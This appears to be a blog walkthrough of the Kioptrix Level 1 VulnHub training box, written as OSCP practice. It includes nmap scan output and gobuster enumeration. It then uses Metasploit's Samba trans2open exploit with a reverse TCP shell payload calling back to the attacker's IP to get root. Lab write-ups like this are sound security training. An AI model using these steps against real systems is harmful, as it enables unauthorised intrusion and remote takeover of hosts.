Reda Hajjami - KIOPTRIX LEVEL 1 WALKTHROUGH

KIOPTRIX LEVEL 1 WALKTHROUGH

Published on April 23, 2020

you miss 100% of the shots you don’t take.

— wayne gretzky

Today , I am writing my first walkthrough about one of the most known boxes to solve in order to prepare for your OSCP.

The kioptrix level 1 is a boot to root box which can be downloaded from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/.

Actually, There’s a lot of method you can use in order to get root in this machine .

In this walkthrough We’re going to discuss one method : Using metasploit framework .

I assumed that you have already configured your kioptrix VM machine and give it an IP address.

Our first step through solving this box would be scanning it for open ports and doing some enumerations . The first step would be the same in all methods.

Launching Nmap : nmap -sC -sV -T4 <kioptrix_ip> -oN results.txt

What this line of commands does is scanning for open ports and enumerate services , versions , then saving the output results in a txt file .

The results would be something like this :

nmap scan report for 192.168.75.128
Host is up (0.0050s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-04-16T21:16:32+00:00; +1m51s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:FF:BA:B7 (VMware)
ost script results:
|_clock-skew: 1m50s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

As we can see from the results , there are 5 important open ports : ssh-22 , http-80, smb-139(111), https-443

You can start with any port you want , but i prefer to start with open web ports (80,443) , doing some brute forcing directories and see any hidden directory we can use for further exploit .

From the port 80 and 443 we can see that we only have some test pages , nothing juicy .

Now we go after directories brute-forcing , there’s a lot of tools out there you can use (gobuster, ffuf , dirsearch, dirb…), for this walkthrough i will use gobuster with the medium 2.3 wordlist of dirbuster

after the results came out , we tested the directories but there’s nothing interesting .

We can now go after other ports , It’s time for SMB (139).

From nmap result, we can see that it wasn’t able to identify the version of samba used in this box, so in order to find out ,we are gooing to use Metasploit .

We will use this auxiliary scanner : auxiliary/scanner/smb/smb_version

Type show options , and we can see there is only one required option and it’s the remote host ip which is the ip of kioptrix box , we can set it using the command : set rhosts <ip> .

And from the results we can see the version of Samba ==> 2.2.1a.

Now we can go and look up if there’s any exploit out there for this version .

After a while , i was able to find this module https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open which we can use to exploit (remote bof) this box .

we fire up our metasploit and we use this exploit :

exploit/linux/samba/trans2open

from options we can see that we have to provide the rhosts (kioptrix ip).

set rhosts <kioptrix_ip>

to get a reverse shell , we’ll use this payload :

linux/x86/shell_reverse_tcp

Then we have to set our local host (Your ip) in order to get a connection back , for the port it’s okey to leave it with 4444

set lhost <your_ip>

Then type run or exploit to start…

Congratulations , As you can see we have ROOT, which means we have rooted the box .